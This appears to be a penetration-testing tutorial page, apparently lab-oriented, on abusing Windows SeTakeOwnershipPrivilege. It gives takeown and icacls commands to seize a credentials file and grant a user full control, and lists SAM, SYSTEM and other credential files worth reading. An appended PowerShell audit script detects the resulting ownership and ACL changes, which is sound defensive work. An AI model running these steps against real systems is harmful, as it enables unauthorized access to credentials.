# SeTakeOwnership

> [SeTakeOwnershipPrivilege](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/take-ownership-of-files-or-other-objects) grants a user the ability to take ownership of any "securable object," meaning Active Directory objects, NTFS files/folders, printers, registry keys, services, and processes. This privilege assigns [WRITE\_OWNER](https://docs.microsoft.com/en-us/windows/win32/secauthz/standard-access-rights) rights over an object, meaning the user can change the owner within the object's security descriptor.

Administrators are assigned this privilege by default. It is rare to see it on regular user accounts, but service accounts can hold it, as can members of Backup Operators (who receive it along with other privileges).

{% hint style="info" %}
Abusing this privilege is a bit of an edge case, but it can be good to know for accessing files we're not supposed to...
{% endhint %}

### Enabling the privilege

The privilege is present in the token but disabled by default. It can be enabled using this [script](https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1), which is detailed in [this](https://www.leeholmes.com/blog/2010/09/24/adjusting-token-privileges-in-powershell/) blog post; [this](https://medium.com/@markmotig/enable-all-token-privileges-a7d21b1a4a77) one builds on the initial concept.

### Launch Attack: Changing ownership of a credentials file

We use the takeown Windows binary to take ownership of the file:

```
takeown /f 'C:\Department Shares\Private\IT\cred.txt'
```

Now that we own the file, we can grant ourselves full control (F) over it:

```
icacls 'C:\Department Shares\Private\IT\cred.txt' /grant htb-student:F
```

### Files to look at

```shell-session
c:\inetpub\wwwroot\web.config
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software
%WINDIR%\repair\security
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
```
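The takeown/icacls sequence above leaves two durable traces on the file: an owner that is no longer a built-in principal and an explicit (non-inherited) Full-control ACE for the user who granted it to themselves. The following audit script is an added example, not part of the original page; it walks the sensitive paths listed above and reports either condition. The set of expected owners and trusted Full-control identities is an assumption about a default build and should be adjusted to your own baseline.

```powershell
# Added example (not from the original page): audit sensitive files for the residue
# of SeTakeOwnership abuse. Run elevated so Get-Acl can read every ACL.
# Assumed baseline: built-ins that normally own these files / hold Full control.
$ExpectedOwners = @(
    'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators',
    'NT SERVICE\TrustedInstaller'
)
$TrustedFullControl = $ExpectedOwners + @('CREATOR OWNER')

# The files called out on this page; most are absent on modern builds and are skipped.
$SensitivePaths = @(
    "$env:SystemDrive\inetpub\wwwroot\web.config",
    "$env:WINDIR\repair\sam",
    "$env:WINDIR\repair\system",
    "$env:WINDIR\repair\software",
    "$env:WINDIR\repair\security",
    "$env:WINDIR\system32\config\SecEvent.Evt",
    "$env:WINDIR\system32\config\default.sav",
    "$env:WINDIR\system32\config\security.sav",
    "$env:WINDIR\system32\config\software.sav",
    "$env:WINDIR\system32\config\system.sav"
)

function Test-SensitiveFileAcl {
    param([string[]]$Paths)
    $full = [System.Security.AccessControl.FileSystemRights]::FullControl
    foreach ($path in $Paths) {
        if (-not (Test-Path -LiteralPath $path)) { continue }
        $acl = Get-Acl -LiteralPath $path

        # Finding 1: takeown changed the owner to the calling user.
        if ($ExpectedOwners -notcontains $acl.Owner) {
            [pscustomobject]@{ Path = $path; Finding = 'UnexpectedOwner'; Principal = $acl.Owner }
        }

        # Finding 2: "icacls ... /grant user:F" writes an explicit Allow ACE with Full control.
        foreach ($ace in $acl.Access) {
            if ($ace.IsInherited -or $ace.AccessControlType -ne 'Allow') { continue }
            if (($ace.FileSystemRights -band $full) -ne $full) { continue }
            $who = $ace.IdentityReference.Value
            if ($TrustedFullControl -contains $who) { continue }
            [pscustomobject]@{ Path = $path; Finding = 'ExplicitFullControl'; Principal = $who }
        }
    }
}

Test-SensitiveFileAcl -Paths $SensitivePaths | Format-Table -AutoSize
```

An empty result means every existing file in the list still has a baseline owner and no untrusted explicit Full-control entry; any row is worth correlating with the account named in Principal.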
